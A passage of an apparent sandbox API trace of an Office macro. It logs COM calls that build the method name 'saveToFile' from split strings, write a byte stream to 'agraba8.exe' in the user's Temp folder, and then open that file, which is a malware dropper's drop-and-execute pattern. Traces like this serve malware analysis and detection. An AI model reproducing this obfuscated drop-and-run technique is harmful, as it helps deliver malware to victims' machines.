_Src="_B_var_pcmLevel" | out: _Dst="_B_var_pcmLevel") returned 0x0 [0045.571] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2e3210, cbMultiByte=16, lpWideCharStr=0x2e3060, cchWideChar=16 | out: lpWideCharStr="_B_var_pcmLevel") returned 16 [0045.571] IUnknown:AddRef (This=0x782a220) returned 0x23 [0045.571] ITypeLib:RemoteIsName (in: This=0x782a220, szNameBuf="_B_var_pcmLevel", lHashVal=0x10a393, pfName=0x2e3130, pBstrLibName=0x2e3060 | out: pfName=0x2e3130*=0, pBstrLibName=0x2e3060) returned 0x0 [0045.571] IUnknown:Release (This=0x782a220) returned 0x22 [0045.571] IUnknown:AddRef (This=0x731da90) returned 0x16 [0045.571] ITypeLib:RemoteIsName (in: This=0x731da90, szNameBuf="_B_var_pcmLevel", lHashVal=0x10a393, pfName=0x2e3130, pBstrLibName=0x2e3060 | out: pfName=0x2e3130*=0, pBstrLibName=0x2e3060) returned 0x0 [0045.571] IUnknown:Release (This=0x731da90) returned 0x15 [0045.571] IUnknown:AddRef (This=0x731cc80) returned 0x13 [0045.571] ITypeLib:RemoteIsName (in: This=0x731cc80, szNameBuf="_B_var_pcmLevel", lHashVal=0x10a393, pfName=0x2e3130, pBstrLibName=0x2e3060 | out: pfName=0x2e3130*=0, pBstrLibName=0x2e3060) returned 0x0 [0045.571] IUnknown:Release (This=0x731cc80) returned 0x12 [0045.571] IUnknown:AddRef (This=0x7829f50) returned 0x8 [0045.571] ITypeLib:RemoteIsName (in: This=0x7829f50, szNameBuf="_B_var_pcmLevel", lHashVal=0x10a393, pfName=0x2e3130, pBstrLibName=0x2e3060 | out: pfName=0x2e3130*=0, pBstrLibName=0x2e3060) returned 0x0 [0045.571] IUnknown:Release (This=0x7829f50) returned 0x7 [0045.571] IUnknown:AddRef (This=0x782b300) returned 0x7 [0045.571] ITypeLib:RemoteIsName (in: This=0x782b300, szNameBuf="_B_var_pcmLevel", lHashVal=0x10a393, pfName=0x2e3130, pBstrLibName=0x2e3060 | out: pfName=0x2e3130*=0, pBstrLibName=0x2e3060) returned 0x0 [0045.571] IUnknown:Release (This=0x782b300) returned 0x6 [0045.571] IUnknown:AddRef (This=0x782a220) returned 0x23 [0045.571] IUnknown:Release (This=0x782a220) returned 0x22 [0045.572] IUnknown:Release (This=0xb4db9e8) returned 0x4 [0045.572] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Data") returned 0x103b06 [0045.572] strcpy_s (in: _Dst=0x2e3060, _DstSize=0x5, _Src="Data" | out: _Dst="Data") returned 0x0 [0045.572] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2e3060, cbMultiByte=5, lpWideCharStr=0x2e2eb0, cchWideChar=5 | out: lpWideCharStr="Data") returned 5 [0045.572] IUnknown:AddRef (This=0x782a220) returned 0x23 [0045.572] ITypeLib:RemoteIsName (in: This=0x782a220, szNameBuf="Data", lHashVal=0x103b06, pfName=0x2e2f80, pBstrLibName=0x2e2eb0 | out: pfName=0x2e2f80*=0, pBstrLibName=0x2e2eb0) returned 0x0 [0045.572] IUnknown:Release (This=0x782a220) returned 0x22 [0045.572] IUnknown:AddRef (This=0x731da90) returned 0x16 [0045.572] ITypeLib:RemoteIsName (in: This=0x731da90, szNameBuf="Data", lHashVal=0x103b06, pfName=0x2e2f80, pBstrLibName=0x2e2eb0 | out: pfName=0x2e2f80*=1, pBstrLibName=0x2e2eb0) returned 0x0 [0045.572] IUnknown:Release (This=0x731da90) returned 0x15 [0045.572] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="Data", cchWideChar=-1, lpMultiByteStr=0x2e3060, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Data", lpUsedDefaultChar=0x0) returned 5 [0045.572] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Data") returned 0x103b06 [0045.572] IMalloc:Alloc (This=0x7fefe015380, cb=0xc) returned 0xb4984b0 [0045.572] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="_B_var_Data") returned 0x10a072 [0045.572] strcpy_s (in: _Dst=0x2e3210, _DstSize=0xc, _Src="_B_var_Data" | out: _Dst="_B_var_Data") returned 0x0 [0045.572] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2e3210, cbMultiByte=12, lpWideCharStr=0x2e3060, cchWideChar=12 | out: lpWideCharStr="_B_var_Data") returned 12 [0045.572] IUnknown:AddRef (This=0x782a220) returned 0x23 [0045.572] ITypeLib:RemoteIsName (in: This=0x782a220, szNameBuf="_B_var_Data", lHashVal=0x10a072, pfName=0x2e3130, pBstrLibName=0x2e3060 | out: pfName=0x2e3130*=0, pBstrLibName=0x2e3060) returned 0x0 [0045.572] IUnknown:Release (This=0x782a220) returned 0x22 [0045.572] IUnknown:AddRef (This=0x731da90) returned 0x16 [0045.572] ITypeLib:RemoteIsName (in: This=0x731da90, szNameBuf="_B_var_Data", lHashVal=0x10a072, pfName=0x2e3130, pBstrLibName=0x2e3060 | out: pfName=0x2e3130*=0, pBstrLibName=0x2e3060) returned 0x0 [0045.572] IUnknown:Release (This=0x731da90) returned 0x15 [0045.572] IUnknown:AddRef (This=0x731cc80) returned 0x13 [0045.572] ITypeLib:RemoteIsName (in: This=0x731cc80, szNameBuf="_B_var_Data", lHashVal=0x10a072, pfName=0x2e3130, pBstrLibName=0x2e3060 | out: pfName=0x2e3130*=0, pBstrLibName=0x2e3060) returned 0x0 [0045.572] IUnknown:Release (This=0x731cc80) returned 0x12 [0045.572] IUnknown:AddRef (This=0x7829f50) returned 0x8 [0045.572] ITypeLib:RemoteIsName (in: This=0x7829f50, szNameBuf="_B_var_Data", lHashVal=0x10a072, pfName=0x2e3130, pBstrLibName=0x2e3060 | out: pfName=0x2e3130*=0, pBstrLibName=0x2e3060) returned 0x0 [0045.572] IUnknown:Release (This=0x7829f50) returned 0x7 [0045.572] IUnknown:AddRef (This=0x782b300) returned 0x7 [0045.572] ITypeLib:RemoteIsName (in: This=0x782b300, szNameBuf="_B_var_Data", lHashVal=0x10a072, pfName=0x2e3130, pBstrLibName=0x2e3060 | out: pfName=0x2e3130*=0, pBstrLibName=0x2e3060) returned 0x0 [0045.572] IUnknown:Release (This=0x782b300) returned 0x6 [0045.572] IUnknown:AddRef (This=0x782a220) returned 0x23 [0045.572] IUnknown:Release (This=0x782a220) returned 0x22 [0045.573] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x6a505fe, cbMultiByte=5, lpWideCharStr=0x2e2f20, cchWideChar=4 | out: lpWideCharStr="Add") returned 0 [0045.573] wcscpy_s (in: _Destination=0xb64bfe0, _SizeInWords=0x4, _Source="Add" | out: _Destination="Add") returned 0x0 [0045.573] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x6a505fe, cbMultiByte=5, lpWideCharStr=0x2e2f20, cchWideChar=4 | out: lpWideCharStr="Add") returned 0 [0045.573] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x6a505fe, cbMultiByte=5, lpWideCharStr=0x2e2f20, cchWideChar=4 | out: lpWideCharStr="Add") returned 0 [0045.573] IUnknown:AddRef (This=0xb4db9e8) returned 0x5 [0045.573] IUnknown:Release (This=0xb4db9e8) returned 0x4 [0045.573] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Size") returned 0x10fbee [0045.573] strcpy_s (in: _Dst=0x2e3060, _DstSize=0x5, _Src="Size" | out: _Dst="Size") returned 0x0 [0045.573] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2e3060, cbMultiByte=5, lpWideCharStr=0x2e2eb0, cchWideChar=5 | out: lpWideCharStr="Size") returned 5 [0045.573] IUnknown:AddRef (This=0x782a220) returned 0x23 [0045.573] ITypeLib:RemoteIsName (in: This=0x782a220, szNameBuf="Size", lHashVal=0x10fbee, pfName=0x2e2f80, pBstrLibName=0x2e2eb0 | out: pfName=0x2e2f80*=0, pBstrLibName=0x2e2eb0) returned 0x0 [0045.573] IUnknown:Release (This=0x782a220) returned 0x22 [0045.573] IUnknown:AddRef (This=0x731da90) returned 0x16 [0045.573] ITypeLib:RemoteIsName (in: This=0x731da90, szNameBuf="Size", lHashVal=0x10fbee, pfName=0x2e2f80, pBstrLibName=0x2e2eb0 | out: pfName=0x2e2f80*=1, pBstrLibName=0x2e2eb0) returned 0x0 [0045.573] IUnknown:Release (This=0x731da90) returned 0x15 [0045.573] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="Size", cchWideChar=-1, lpMultiByteStr=0x2e3060, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Size", lpUsedDefaultChar=0x0) returned 5 [0045.573] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Size") returned 0x10fbee [0045.573] IMalloc:Alloc (This=0x7fefe015380, cb=0xc) returned 0xb4984b0 [0045.573] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="_B_var_Size") returned 0x10611b [0045.573] strcpy_s (in: _Dst=0x2e3210, _DstSize=0xc, _Src="_B_var_Size" | out: _Dst="_B_var_Size") returned 0x0 [0045.573] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2e3210, cbMultiByte=12, lpWideCharStr=0x2e3060, cchWideChar=12 | out: lpWideCharStr="_B_var_Size") returned 12 [0045.573] IUnknown:AddRef (This=0x782a220) returned 0x23 [0045.573] ITypeLib:RemoteIsName (in: This=0x782a220, szNameBuf="_B_var_Size", lHashVal=0x10611b, pfName=0x2e3130, pBstrLibName=0x2e3060 | out: pfName=0x2e3130*=0, pBstrLibName=0x2e3060) returned 0x0 [0045.573] IUnknown:Release (This=0x782a220) returned 0x22 [0045.573] IUnknown:AddRef (This=0x731da90) returned 0x16 [0045.573] ITypeLib:RemoteIsName (in: This=0x731da90, szNameBuf="_B_var_Size", lHashVal=0x10611b, pfName=0x2e3130, pBstrLibName=0x2e3060 | out: pfName=0x2e3130*=0, pBstrLibName=0x2e3060) returned 0x0 [0045.573] IUnknown:Release (This=0x731da90) returned 0x15 [0045.573] IUnknown:AddRef (This=0x731cc80) returned 0x13 [0045.573] ITypeLib:RemoteIsName (in: This=0x731cc80, szNameBuf="_B_var_Size", lHashVal=0x10611b, pfName=0x2e3130, pBstrLibName=0x2e3060 | out: pfName=0x2e3130*=0, pBstrLibName=0x2e3060) returned 0x0 [0045.573] IUnknown:Release (This=0x731cc80) returned 0x12 [0045.573] IUnknown:AddRef (This=0x7829f50) returned 0x8 [0045.574] ITypeLib:RemoteIsName (in: This=0x7829f50, szNameBuf="_B_var_Size", lHashVal=0x10611b, pfName=0x2e3130, pBstrLibName=0x2e3060 | out: pfName=0x2e3130*=0, pBstrLibName=0x2e3060) returned 0x0 [0045.574] IUnknown:Release (This=0x7829f50) returned 0x7 [0045.574] IUnknown:AddRef (This=0x782b300) returned 0x7 [0045.574] ITypeLib:RemoteIsName (in: This=0x782b300, szNameBuf="_B_var_Size", lHashVal=0x10611b, pfName=0x2e3130, pBstrLibName=0x2e3060 | out: pfName=0x2e3130*=0, pBstrLibName=0x2e3060) returned 0x0 [0045.574] IUnknown:Release (This=0x782b300) returned 0x6 [0045.574] IUnknown:AddRef (This=0x782a220) returned 0x23 [0045.574] IUnknown:Release (This=0x782a220) returned 0x22 [0045.574] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x6a50432, cbMultiByte=6, lpWideCharStr=0x2e2f20, cchWideChar=5 | out: lpWideCharStr="Size") returned 0 [0045.574] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x6a50622, cbMultiByte=9, lpWideCharStr=0x2e2f20, cchWideChar=8 | out: lpWideCharStr="ToArray") returned 0 [0045.574] wcscpy_s (in: _Destination=0xb64bff0, _SizeInWords=0x8, _Source="ToArray" | out: _Destination="ToArray") returned 0x0 [0045.574] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x6a5045a, cbMultiByte=6, lpWideCharStr=0x2e2f20, cchWideChar=5 | out: lpWideCharStr="Data") returned 0 [0045.574] IUnknown:AddRef (This=0xb4db9e8) returned 0x5 [0045.574] IUnknown:Release (This=0xb4db9e8) returned 0x4 [0045.574] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Start") returned 0x1006be [0045.574] strcpy_s (in: _Dst=0x2e3060, _DstSize=0x6, _Src="Start" | out: _Dst="Start") returned 0x0 [0045.574] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2e3060, cbMultiByte=6, lpWideCharStr=0x2e2eb0, cchWideChar=6 | out: lpWideCharStr="Start") returned 6 [0045.574] IUnknown:AddRef (This=0x782a220) returned 0x23 [0045.574] ITypeLib:RemoteIsName (in: This=0x782a220, szNameBuf="Start", lHashVal=0x1006be, pfName=0x2e2f80, pBstrLibName=0x2e2eb0 | out: pfName=0x2e2f80*=0, pBstrLibName=0x2e2eb0) returned 0x0 [0045.574] IUnknown:Release (This=0x782a220) returned 0x22 [0045.574] IUnknown:AddRef (This=0x731da90) returned 0x16 [0045.574] ITypeLib:RemoteIsName (in: This=0x731da90, szNameBuf="Start", lHashVal=0x1006be, pfName=0x2e2f80, pBstrLibName=0x2e2eb0 | out: pfName=0x2e2f80*=1, pBstrLibName=0x2e2eb0) returned 0x0 [0045.574] IUnknown:Release (This=0x731da90) returned 0x15 [0045.574] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="Start", cchWideChar=-1, lpMultiByteStr=0x2e3060, cbMultiByte=6, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Start", lpUsedDefaultChar=0x0) returned 6 [0045.574] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Start") returned 0x1006be [0045.574] IMalloc:Alloc (This=0x7fefe015380, cb=0xd) returned 0xb4984b0 [0045.574] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="_B_var_Start") returned 0x10caea [0045.574] strcpy_s (in: _Dst=0x2e3210, _DstSize=0xd, _Src="_B_var_Start" | out: _Dst="_B_var_Start") returned 0x0 [0045.574] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2e3210, cbMultiByte=13, lpWideCharStr=0x2e3060, cchWideChar=13 | out: lpWideCharStr="_B_var_Start") returned 13 [0045.574] IUnknown:AddRef (This=0x782a220) returned 0x23 [0045.574] ITypeLib:RemoteIsName (in: This=0x782a220, szNameBuf="_B_var_Start", lHashVal=0x10caea, pfName=0x2e3130, pBstrLibName=0x2e3060 | out: pfName=0x2e3130*=0, pBstrLibName=0x2e3060) returned 0x0 [0045.574] IUnknown:Release (This=0x782a220) returned 0x22 [0045.574] IUnknown:AddRef (This=0x731da90) returned 0x16 [0045.575] ITypeLib:RemoteIsName (in: This=0x731da90, szNameBuf="_B_var_Start", lHashVal=0x10caea, pfName=0x2e3130, pBstrLibName=0x2e3060 | out: pfName=0x2e3130*=0, pBstrLibName=0x2e3060) returned 0x0 [0045.575] IUnknown:Release (This=0x731da90) returned 0x15 [0045.575] IUnknown:AddRef (This=0x731cc80) returned 0x13 [0045.575] ITypeLib:RemoteIsName (in: This=0x731cc80, szNameBuf="_B_var_Start", lHashVal=0x10caea, pfName=0x2e3130, pBstrLibName=0x2e3060 | out: pfName=0x2e3130*=0, pBstrLibName=0x2e3060) returned 0x0 [0045.575] IUnknown:Release (This=0x731cc80) returned 0x12 [0045.575] IUnknown:AddRef (This=0x7829f50) returned 0x8 [0045.575] ITypeLib:RemoteIsName (in: This=0x7829f50, szNameBuf="_B_var_Start", lHashVal=0x10caea, pfName=0x2e3130, pBstrLibName=0x2e3060 | out: pfName=0x2e3130*=0, pBstrLibName=0x2e3060) returned 0x0 [0045.575] IUnknown:Release (This=0x7829f50) returned 0x7 [0045.575] IUnknown:AddRef (This=0x782b300) returned 0x7 [0045.575] ITypeLib:RemoteIsName (in: This=0x782b300, szNameBuf="_B_var_Start", lHashVal=0x10caea, pfName=0x2e3130, pBstrLibName=0x2e3060 | out: pfName=0x2e3130*=0, pBstrLibName=0x2e3060) returned 0x0 [0045.575] IUnknown:Release (This=0x782b300) returned 0x6 [0045.575] IUnknown:AddRef (This=0x782a220) returned 0x23 [0045.575] IUnknown:Release (This=0x782a220) returned 0x22 [0045.575] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x6a50432, cbMultiByte=6, lpWideCharStr=0x2e2f20, cchWideChar=5 | out: lpWideCharStr="Size") returned 0 [0045.575] IUnknown:AddRef (This=0xb4db9e8) returned 0x5 [0045.575] IUnknown:Release (This=0xb4db9e8) returned 0x4 [0045.575] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0xb514594, cbMultiByte=1, lpWideCharStr=0xa522a3c, cchWideChar=4 | out: lpWideCharStr="4") returned 1 [0045.575] IUnknown:Release (This=0xb4db9e8) returned 0x4 [0045.575] IMalloc:Free (This=0x7fefe015380, pv=0xb5ad6b0) [0045.576] IDispatch:GetIDsOfNames (in: This=0xdfc1400, riid=0x7fee3a6aa58*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x2e4a20*="Write", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x2e4a04 | out: rgDispId=0x2e4a04*=13) returned 0x0 [0045.577] IDispatch:Invoke (in: This=0xdfc1400, dispIdMember=13, riid=0x7fee3a6aa58*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), lcid=0x409, wFlags=0x1, pDispParams=0x2e49b8*(rgvarg=([0]=0xb4047e8*(varType=0x400c, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x7801608*(varType=0x2011, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0xb676b70*(cDims=0x1, fFeatures=0x2080, cbElements=0x1, cLocks=0x0, pvData=0xb676b90*, rgsabound=((cElements=0x97800, lLbound=0))), varVal2=0x0), varVal2=0x7801608)), rgdispidNamedArgs=0x0, cArgs=0x1, cNamedArgs=0x0), pVarResult=0x0, pExcepInfo=0x2e49d0, puArgErr=0x2e49b0 | out: pDispParams=0x2e49b8*(rgvarg=([0]=0xb4047e8*(varType=0x400c, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x7801608*(varType=0x2011, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0xb676b70*(cDims=0x1, fFeatures=0x2080, cbElements=0x1, cLocks=0x0, pvData=0xb676b90*, rgsabound=((cElements=0x97800, lLbound=0))), varVal2=0x0), varVal2=0x7801608)), rgdispidNamedArgs=0x0, cArgs=0x1, cNamedArgs=0x0), pVarResult=0x0, pExcepInfo=0x2e49d0*(wCode=0x0, wReserved=0x0, bstrSource=0x0, bstrDescription=0x0, bstrHelpFile=0x0, dwHelpContext=0x0, pvReserved=0x0, pfnDeferredFillIn=0x0, scode=0x0), puArgErr=0x2e49b0*=0x2e4a04) returned 0x0 [0045.589] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0xb52f9a0, cbMultiByte=3, lpWideCharStr=0x9e4022c, cchWideChar=8 | out: lpWideCharStr="sav") returned 3 [0045.589] IUnknown:AddRef (This=0xb5a5078) returned 0xb [0045.589] ITypeInfo:GetRefTypeOfImplType (in: This=0xb5a5078, index=0xffffffff, pRefType=0x2e2e50 | out: pRefType=0x2e2e50*=0xfffffffe) returned 0x0 [0045.589] ITypeInfo:GetRefTypeInfo (in: This=0xb5a5078, hreftype=0xfffffffe, ppTInfo=0x2e2f28 | out: ppTInfo=0x2e2f28*=0xb5a5018) returned 0x0 [0045.589] IUnknown:Release (This=0xb5a5078) returned 0xa [0045.589] ITypeInfo:GetRefTypeInfo (in: This=0xb5a5018, hreftype=0x49, ppTInfo=0x2e26b8 | out: ppTInfo=0x2e26b8*=0xb5b2308) returned 0x0 [0045.589] IUnknown:QueryInterface (in: This=0xb5b2308, riid=0x7fee3a7ade8*(Data1=0xcacc1e88, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x2e2888 | out: ppvObject=0x2e2888*=0x0) returned 0x80004002 [0045.589] ITypeInfo:RemoteGetTypeAttr (in: This=0xb5b2308, ppTypeAttr=0x2e2708, pDummy=0x10 | out: ppTypeAttr=0x2e2708, pDummy=0x10) returned 0x0 [0045.589] ITypeInfo:LocalReleaseTypeAttr (This=0xb5b2308) returned 0x0 [0045.589] IUnknown:Release (This=0xb5b2308) returned 0x2 [0045.589] IUnknown:AddRef (This=0xb5b2308) returned 0x3 [0045.589] IUnknown:AddRef (This=0xb5b2308) returned 0x3 [0045.589] ITypeInfo:RemoteGetTypeAttr (in: This=0xb5a5018, ppTypeAttr=0x2e3328, pDummy=0x0 | out: ppTypeAttr=0x2e3328, pDummy=0x0) returned 0x0 [0045.589] ITypeInfo:LocalReleaseTypeAttr (This=0xb5a5018) returned 0x0 [0045.589] IUnknown:Release (This=0xb5a5018) returned 0xb [0045.590] IMalloc:Free (This=0x7fefe015380, pv=0xb65a7d0) [0045.590] ITypeInfo:RemoteGetTypeAttr (in: This=0xb5a5018, ppTypeAttr=0x2e28c0, pDummy=0x0 | out: ppTypeAttr=0x2e28c0, pDummy=0x0) returned 0x0 [0045.590] ITypeInfo:LocalReleaseTypeAttr (This=0xb5a5018) returned 0x0 [0045.590] IUnknown:Release (This=0xb5b2308) returned 0x2 [0045.590] IUnknown:AddRef (This=0xb5b23b8) returned 0x4 [0045.590] ITypeInfo:RemoteGetTypeAttr (in: This=0xb5b23b8, ppTypeAttr=0x2e3328, pDummy=0x9e40674 | out: ppTypeAttr=0x2e3328, pDummy=0x9e40674*=0x0) returned 0x0 [0045.590] ITypeInfo:LocalReleaseTypeAttr (This=0xb5b23b8) returned 0x0 [0045.590] IUnknown:Release (This=0xb5b23b8) returned 0x3 [0045.590] IMalloc:Free (This=0x7fefe015380, pv=0xb65a7d0) [0045.590] ITypeInfo:RemoteGetTypeAttr (in: This=0xb5b23b8, ppTypeAttr=0x2e28c0, pDummy=0x0 | out: ppTypeAttr=0x2e28c0, pDummy=0x0) returned 0x0 [0045.590] ITypeInfo:LocalReleaseTypeAttr (This=0xb5b23b8) returned 0x0 [0045.590] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x6821556, cbMultiByte=6, lpWideCharStr=0x2e2dc0, cchWideChar=5 | out: lpWideCharStr="Open") returned 0 [0045.590] wcscpy_s (in: _Destination=0xb5c8270, _SizeInWords=0x5, _Source="Open" | out: _Destination="Open") returned 0x0 [0045.590] IMalloc:Free (This=0x7fefe015380, pv=0xb65a7d0) [0045.590] ITypeInfo:RemoteGetTypeAttr (in: This=0xb5a5018, ppTypeAttr=0x2e2b90, pDummy=0x0 | out: ppTypeAttr=0x2e2b90, pDummy=0x0) returned 0x0 [0045.590] ITypeInfo:LocalReleaseTypeAttr (This=0xb5a5018) returned 0x0 [0045.590] IMalloc:Free (This=0x7fefe015380, pv=0xb65a7d0) [0045.590] ITypeInfo:RemoteGetTypeAttr (in: This=0xb5b23b8, ppTypeAttr=0x2e2dd0, pDummy=0x0 | out: ppTypeAttr=0x2e2dd0, pDummy=0x0) returned 0x0 [0045.590] ITypeInfo:LocalReleaseTypeAttr (This=0xb5b23b8) returned 0x0 [0045.591] IMalloc:Free (This=0x7fefe015380, pv=0xb5a5f10) [0045.592] SafeArrayAllocDescriptorEx (in: vt=0x0, cDims=0x1, ppsaOut=0xb4047b8 | out: ppsaOut=0xb4047b8) returned 0x0 [0045.592] SafeArrayAllocData (psa=0x734d900) returned 0x0 [0045.592] VarBstrCat (in: bstrLeft="sav", bstrRight="eToFile", pbstrResult=0x2e48d0 | out: pbstrResult=0x2e48d0) returned 0x0 [0045.592] Stream:IUnknown:AddRef (This=0xdfc1400) returned 0x2 [0045.592] IDispatch:GetIDsOfNames (in: This=0xdfc1400, riid=0x7fee3a6aa58*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x2e4890*="saveToFile", cNames=0x1, lcid=0x368c00000409, rgDispId=0x2e4780 | out: rgDispId=0x2e4780*=17) returned 0x0 [0045.592] IDispatch:Invoke (in: This=0xdfc1400, dispIdMember=17, riid=0x7fee3a6aa58*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), lcid=0x409, wFlags=0x1, pDispParams=0x2e4798*(rgvarg=([0]=0x734d930*(varType=0x2, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x2, varVal2=0x0), [1]=0x734d948*(varType=0x4008, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x78015d0*="C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\agraba8.exe", varVal2=0x0)), rgdispidNamedArgs=0x0, cArgs=0x2, cNamedArgs=0x0), pVarResult=0x2e47b8, pExcepInfo=0x2e4820, puArgErr=0x0 | out: pDispParams=0x2e4798*(rgvarg=([0]=0x734d930*(varType=0x2, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x2, varVal2=0x0), [1]=0x734d948*(varType=0x4008, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x78015d0*="C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\agraba8.exe", varVal2=0x0)), rgdispidNamedArgs=0x0, cArgs=0x2, cNamedArgs=0x0), pVarResult=0x2e47b8*(varType=0x0, wReserved1=0xeabb, wReserved2=0x7fe, wReserved3=0x0, varVal1=0xb4047d0, varVal2=0xb41a6a0), pExcepInfo=0x2e4820*(wCode=0x0, wReserved=0x0, bstrSource="sav", bstrDescription=0x14, bstrHelpFile=0x6, dwHelpContext=0xb404788, pvReserved=0x7fefd65d8ff, pfnDeferredFillIn=0x2e48d0, scode=0xb5ce498), puArgErr=0x0) returned 0x0 [0045.615] SafeArrayDestroyData (psa=0x734d900) returned 0x0 [0045.615] SafeArrayDestroyDescriptor (psa=0x734d900) returned 0x0 [0045.615] IDispatch:GetIDsOfNames (in: This=0xb5a76b0, riid=0x7fee3a6aa58*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x2e48c0*="Open", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x2e48a4 | out: rgDispId=0x2e48a4*=1610743813) returned 0x0 [0045.624] IDispatch:Invoke (in: This=0xb5a76b0, dispIdMember=1610743813, riid=0x7fee3a6aa58*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), lcid=0x409, wFlags=0x1, pDispParams=0x2e4858*(rgvarg=([0]=0xb404758*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\agraba8.exe", varVal2=0x0)), rgdispidNamedArgs=0x0, cArgs=0x1, cNamedArgs=0x0), pVarResult=0x0, pExcepInfo=0x2e4870, puArgErr=0x2e4850 | out: pDispParams=0x2e4858*(rgvarg=([0]=0xb404758*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\agraba8.exe", varVal2=0x0)), rgdispidNamedArgs=0x0, cArgs=0x1, cNamedArgs=0x0), pVarResult=0x0, pExcepInfo=0x2e4870*(wCode=0x0, wReserved=0x0, bstrSource=0x0, bstrDescription=0x0, bstrHelpFile=0x0, dwHelpContext=0x0, pvReserved=0x0, pfnDeferredFillIn=0x0, scode=0x0), puArgErr=0x2e4850*=0x409) returned 0x0 [0045.771] GetWindowLongPtrA (hWnd=0x10250, nIndex=-21) returned 0x91e3308 [0045.771] NtdllDefWindowProc_A (hWnd=0x10250, Msg=0x1c, wParam=0x1, lParam=0x0) returned 0x0 [0045.771] GetWindowLongPtrA (hWnd=0x1024e, nIndex=-21) returned 0x91e3298 [0045.771] NtdllDefWindowProc_A (hWnd=0x1024e, Msg=0x1c, wParam=0x1, lParam=0x0) returned 0x0 [0045.771] GetWindowLongPtrA (hWnd=0x1024c, nIndex=-21) returned 0x91e3228 [0045.771] NtdllDefWindowProc_A (hWnd=0x1024c, Msg=0x1c, wParam=0x1, lParam=0x0) returned 0x0 [0045.771] GetWindowLongPtrA (hWnd=0x1024a, nIndex=-21) returned 0x91e31b8 [0045.771] NtdllDefWindowProc_A (hWnd=0x1024a, Msg=0x1c, wParam=0x1, lParam=0x0) returned 0x0 [0045.771] CallWindowProcA (lpPrevWndFunc=0xffff021b, hWnd=0x1023e, Msg=0x1c, wParam=0x1, lParam=0x0) returned 0x0 [0045.771] 